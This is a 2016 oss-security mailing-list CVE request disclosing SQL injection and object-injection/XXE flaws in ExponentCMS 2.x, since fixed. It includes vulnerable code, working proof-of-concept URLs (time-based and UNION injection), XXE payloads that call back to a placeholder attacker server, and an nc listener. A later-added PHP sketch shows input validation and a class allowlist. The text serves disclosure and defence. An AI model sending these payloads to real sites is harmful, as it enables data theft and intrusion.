
List:       oss-security
Subject:    [oss-security] CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities
From:       Carl Peng <felixk3y () gmail ! com>
Date:       2016-09-30 4:22:38
Message-ID: CAEiFw0WzL4iVgrZYJsoizHbX8_s+tgGc4xJDnYgr1y4SVv=UrA () mail ! gmail ! com


Hello,
I reported the following vulnerabilities to the ExponentCMS team some days
ago, and they have now been fixed.

1) sqli-1
/framework/modules/ecommerce/controllers/cartController.php
lines 61 - 66:
```
$product_type = isset($this->params['product_type']) ? $this->params['product_type'] : 'product';
$product      = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children']))
    $c = $product->find('first', 'parent_id=' . $this->params['product_id']); //sqli
if (!empty($c->id)) {
    flash('message', gt("Please select a product and quantity from the options listed below to add to your cart."));
    redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=> $this->params['product_id']));
}
```
The "product_id" parameter is not filtered, so we can input
"product_id=sqli" to execute SQL statements.
Proof of concept:
/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2
/framework/modules/help/controllers/helpController.php
lines 122 - 131:
```
if (empty($this->params['version']) || $this->params['version'] == 'current') {
    $version_id = help_version::getCurrentHelpVersionId();
} else {
    $version_id = help_version::getHelpVersionId($this->params['version']); //sqli
    if (empty($version_id)) {
        $version_id = help_version::getCurrentHelpVersionId();
    }
}
$doc = $help->find('first', 'help_version_id='.$version_id.' AND sef_url="'.$this->params['title'].'"'); //sqli
$children = $help->find('count','parent='.$doc->id);
```
The "version" and "title" parameters are not filtered, so we can input
"version=sqli" or "title=sqli" to execute SQL statements.
Proof of concept:
/index.php?controller=help&action=show&version=1" union select
1%23&title=aaa" union select
1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1
/framework/modules/core/controllers/expTagController.php#L228-L232
```
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20 \
root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E


4) Object Injection -2
/framework/modules/core/controllers/expCatController.php#L175-L182
```
if (!empty($this->params['change_cat'])) {
foreach ($this->params['change_cat'] as $item) {
$classname = $this->params['mod'];
$object = new $classname($item);
$params['expCat'][0] = $this->params['newcat'];
$object->update($params);
}
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20 \
root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E


```
[root@cloud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080
```


And now, all vulnerabilities have been fixed.
https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

These issues were reported by Peng Hua of silence.com.cn Inc. and I would
like to request CVEs for these issues (if not already done).

-------------------
http://www.silence.com.cn/
penghua@silence.com.cn
PKAV Team
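
The input handling that would stop the four patterns reported above, as an added example (it is not part of the original message and is not the ExponentCMS fix in the linked commits): integer validation before a value reaches a WHERE clause, and a class allowlist before `new $classname(...)`. The helper names `int_param` and `new_allowed_model`, the allowlist and the stub `product` class are assumptions made for illustration; PHP 7.2 or later is assumed.

```php
<?php
// Added illustration: helper names, the allowlist and the stub class are
// hypothetical and are not ExponentCMS code.

/** Return $params[$key] as a non-negative int, or null unless it is all digits. */
function int_param(array $params, string $key): ?int
{
    $v = $params[$key] ?? null;
    if (!is_string($v) && !is_int($v)) {
        return null;                      // arrays, null, floats, objects
    }
    $v = (string)$v;
    return ctype_digit($v) ? (int)$v : null;
}

/** Instantiate $classname only when it is on an explicit allowlist. */
function new_allowed_model(string $classname, array $allowlist, int $id): object
{
    if (!in_array($classname, $allowlist, true)) {
        throw new InvalidArgumentException("class not permitted: $classname");
    }
    return new $classname($id);
}

// Constructed stand-in for a CMS model whose constructor takes a record id.
class product { public $id; public function __construct(int $id) { $this->id = $id; } }

// Constructed request parameters with the same shape as the reported requests.
$params = ['product_id' => '-1/**/and/**/1=1', 'mod' => 'SimpleXMLElement',
           'change_tag' => ['<root/>', '42']];

// Items 1 and 2: only a validated integer is concatenated into the WHERE clause.
$pid = int_param($params, 'product_id');
echo $pid === null ? "product_id rejected\n" : "parent_id=$pid\n";

// Items 3 and 4: the class comes from an allowlist and each item must be an id.
foreach (['SimpleXMLElement', 'product'] as $mod) {
    foreach ($params['change_tag'] as $raw) {
        $id = int_param(['id' => $raw], 'id');
        try {
            if ($id === null) { throw new InvalidArgumentException("bad id"); }
            $obj = new_allowed_model($mod, ['product'], $id);
            echo get_class($obj), " #{$obj->id} accepted\n";
        } catch (InvalidArgumentException $e) {
            echo "$mod: ", $e->getMessage(), "\n";
        }
    }
}
```

String values such as `title` in item 2 cannot be validated as integers; they need bound parameters or the database layer's own escaping before they are placed in a query.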


